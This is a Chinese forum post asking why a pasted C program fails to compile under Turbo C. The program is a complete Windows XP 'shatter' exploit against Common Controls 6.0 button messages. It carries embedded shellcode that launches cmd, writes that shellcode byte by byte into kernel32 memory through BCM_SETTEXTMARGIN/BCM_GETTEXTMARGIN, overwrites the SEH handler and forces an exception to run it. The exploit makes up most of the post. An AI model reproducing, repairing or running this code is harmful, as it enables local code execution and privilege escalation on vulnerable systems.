代码:
--------------------------------------------------------------------------------
#include <windows.h>
#define _WIN32_WINNT 0x501
#include <commctrl.h>
#include <stdio.h>// Local Cmd Shellcode.
// Added a loadLibrary call to make sure msvcrt.dll is present -- olBYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";char g_classNameBuf[ 256 ];char tWindow[]="Calculator";// The name of the main window#define SEH_HANDLER_ADDR 0x77ed73B4 // Critical Address To Overwrite// you might want to find a less destructive spot to stick the code, but this works for me --ol#define SHELLCODE_ADDR 0x77ed7484 // Known Writeable Space Or Global Space// The range between these will be scanned to find our shellcode bytes.#define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32#define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where we stop looking for bytes.void doWrite(HWND hWnd, BYTE tByte, BYTE* address);void IterateWindows(long hWnd);void *FindByteInKernel32( BYTE byte );void ErrorTrace(const char *msg, DWORD error){ DWORD numWritten; WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL); if (error) { LPTSTR lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, error, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL ); WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL); // Free the buffer. LocalFree( lpMsgBuf );}}//"Should there be a reason to believe that code that comes from a variety//of people, unknown from around the world, should be somehow of higher quality//than that from people who get paid to do it professionally?"// - Steve Ballmer// (Hey, wait, are MS employees generally household names?// Isn't MS an equal opportunity employer?)int main(int argc, char *argv[]){long hWnd;HMODULE hMod;DWORD ProcAddr;printf("%% Playing with CommCtrl 6.0 messages\n");printf("%% Oliver Lavery.\n\n");printf("%% based on Shatter SEH code by\n");printf("%% brett moore security-assessment com\n\n");// Find local procedure addresshMod = LoadLibrary("kernel32.dll");ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr;hMod = LoadLibrary("msvcrt.dll");ProcAddr = (DWORD)GetProcAddress(hMod, "system");if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr;printf("+ Finding %s Window...\n",tWindow);hWnd = (long)FindWindow(NULL,tWindow);if(hWnd == NULL){ printf("+ Couldn't Find %s Window\n",tWindow); return 0;}printf("+ Found Main Window At...0x%xh\n",hWnd);IterateWindows(hWnd);printf("+ Not Done...\n");return 0;}void *FindByteInKernel32( BYTE byte ){BYTE *addr = KERN32_BASE_ADDR;while ( addr < KERN32_TOP_ADDR ) { if ( *addr == byte ) return addr;addr++;}ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0 );exit(0);}//"Should there be any reason to believe that a relatively small group of//paid programmers working under the direction of a marketing machine can produce//code approaching the quality of a global team linked by the internet, whose//every line of code is subject to ruthless peer review, and whose only standard//is excellence?"// - crunchie812void doWrite(HWND hWnd, BYTE tByte, BYTE *address){void *byte_addr;byte_addr = FindByteInKernel32( tByte );SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr);if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) { ErrorTrace( "error", GetLastError() );}}void IterateWindows(long hWnd){long childhWnd,looper;childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );while ( strcmp(g_classNameBuf, "Button") ){// IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );}if(childhWnd != NULL){ printf("+ Found button control..0x%xh\n",childhWnd); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)childhWnd, exploit[looper],(BYTE *)(SHELLCODE_ADDR + looper)); // Overwrite SEH printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE *)SEH_HANDLER_ADDR); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR+1); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR+2); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF); printf("+ Done...\n"); exit(0);}}
--------------------------------------------------------------------------------
这是用C来编译吗?
这是我用了TRUBO C编译时出现的错误,前两个好理解说缺少函数WINDOWS.H和COMMCTRL.H那后面几个是什么意思呢?
C:\tc\INCLUDE也并没有WINDOWS.H和COMMCTRL.H呀,我在BAIDU搜了一下也没有找到下的,这是用TRUBO C来编译的的吗?
谁可以告诉我那里可以下呢?
|
论坛用户
版主
论坛用户
论坛: 编程破解
标题: 编译WindowsXP图象式样可执行任意代码出错不解~